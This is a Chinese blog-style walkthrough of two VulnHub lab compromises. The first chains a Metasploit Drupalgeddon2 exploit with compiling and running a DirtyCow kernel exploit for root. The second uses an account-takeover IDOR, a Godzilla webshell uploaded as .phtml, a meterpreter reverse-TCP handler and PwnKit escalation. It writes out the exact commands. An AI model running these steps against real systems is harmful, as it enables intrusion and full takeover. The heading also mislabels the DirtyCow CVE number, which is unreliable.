当前位置: 首页 > news >正文

linux内核漏洞检测利用exp提权

news 2025/7/19 1:12:42

案例一dirtycow(CVE-2016-5159)

有个前置知识就是  获取liunx的内核

hostnamectl

uname -a

然后这个内核漏洞进行提权的步骤也是和手工win进行提权差不多   也是需要使用辅助工具在本地进行辅助检测  然后去nomi-sec/PoC-in-GitHub: 📡 从 GitHub 自动收集 PoC。⚠️ 小心恶意软件。

去找寻exp或者使用   msf本地的  梭哈模块去寻找利用的漏洞

run post/multi/recon/local_exploit_suggester

辅助检测工具:

单一的内核漏洞检测:https://github.com/The-Z-Labs/linux-exploit-suggester

综合型的工具:

https://github.com/diego-treitos/linux-smart-enumeration
我们把.sh文件上传到/usr/share 下
然后我们扫描一下我们的靶机
https://www.vulnhub.com/entry/lampiao-1,249/
靶机下载地址
信息收集扫描ip扫描
访问80端口发现没有信息访问1898
看到这个外星人图标就知道是内网渗透中经常出现的Drupal
这个最常见的利用就是框架漏洞
发现是低版本的php搭建的 所以直接进行利用
这里我直接使用第二个exp
使用use进行调用
查看利用的配置  
检查一下payload
设置上  rhost和rport
 
报这个标头就是进入了 后渗透模式  就是我们已经控制了对方的主机
查看用户权限
找好定位我们现在是在web权限上
输入shell获取对方的命令行
查看id是1000内的所以我们的目标是拿取root权限
需要使用漏洞 先上传检测文件
报了小脏牛漏洞  直接去github上找 nomi-sec/PoC-in-GitHub: 📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.
利用的exp
exp上传  
上传之后把exp.c进行编译 
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

python -c 'import pty; pty.spawn("/bin/bash")' 
复现环境:https://www.vulnhub.com/entry/lampiao-1,249/
1、信息收集:
nmap -p1-65535 192.168.139.0/24
2、Web漏洞利用:
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.46.144
set rport 1898
run
3、内核提权:
upload /root/linux-exploit-suggester.sh /tmp/1.sh
shell
cd /tmp
chmod +x 1.sh
./1.sh
https://github.com/gbonacini/CVE-2016-5195
upload /root/dcow.cpp /tmp/dcow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow
su root

案例二  pwnkit  

靶机下载https://www.vulnhub.com/entry/darkhole-1,724/

sudo arp-scan -l

先扫描内网的ip

开放了80 

这个漏洞是前端的一个逻辑越权漏洞 先注册一个账号

账号修改里出现这个id可能就是 代表的账户 

我们试一下改为1会不会直接修改admin的账号和密码

哥斯拉生成后门 使用绕过形式 改为 .phtml 进行绕过

后门上传成功

后门地点

http://192.168.248.136/upload/xxx.phtml

学个新操做   哥斯拉联动msf(在不使用msfvemon生成反弹shell的情况下)

命令:

71  use /exploits/multi/handler
72  ip a
73  set payload php/meterpreter/reverse_tcp
74  set lport 5566
75  history

先加载再go

接受到了shell   然后进行提权

上传检测脚本

这个就是我们要学的新漏洞

第一个方法就是使用本地漏扫工具

run post/multi/recon/local_exploit_suggester
二就是  使用search 搜索cve编号看看exp库中有没有利用的
提权成功
http://www.dtcms.com/a/107495.html

相关文章:

  • Echarts 地图下钻实现过程记录
  • Bootstrap 表格:高效布局与动态交互的实践指南
  • Java8 到 Java21 系列之 Lambda 表达式:函数式编程的开端(Java 8)
  • 深入剖析 Hive Fetch 抓取机制:原理、优化与实践
  • 【Axure元件分享】月份范围选择器
  • msvcr110.dll丢失的几种修复方法指南,msvcr110.dll是什么文件
  • 第四章、Isaacsim在GUI中构建机器人(2):组装一个简单的机器人
  • 10.使用路由缓存提升性能
  • DHT11数字温湿度传感器驱动开发全解析(下) | 零基础入门STM32第八十八步
  • emqx中LwM2M
  • 第七天 - re正则表达式模块 - 日志文件模式匹配 - 练习:Nginx日志分析器
  • 企业数据治理实践:“七剑” 合璧,释放数据价值
  • python string 类型字符拼接 +=的缺点,以及取代方法
  • python/pytorch杂聊
  • Nature旗下 | npj Digital Medicine | 图像+转录组+临床变量三合一,多模态AI预测化疗反应,值得复现学习的完整框架
  • 大智慧前端面试题及参考答案
  • 爬虫【feapder框架】
  • 【LeetCode基础算法】二叉树所有类型
  • ESLint语法报错
  • Mysql基础笔记
  • 论文:Generalized Category Discovery with Clustering Assignment Consistency
  • 获取各类基本因子
  • day21和day22学习Pandas库
  • Ray Flow Insight:让分布式系统调试不再“黑盒“
  • 【模型部署】onnx模型-LOOP 节点实例
  • 2.3.3 使用@Profile注解进行多环境配置
  • 高通将进军英国芯片 IP 业务 Alphawave
  • Qt线程等待条件QWaitCondition
  • 深入理解DRAM刷新机制:异步刷新为何无需扣除刷新时间?
  • 风电行业预测性维护解决方案:给风机装上 “智能医生”,实现故障 “秒级预警”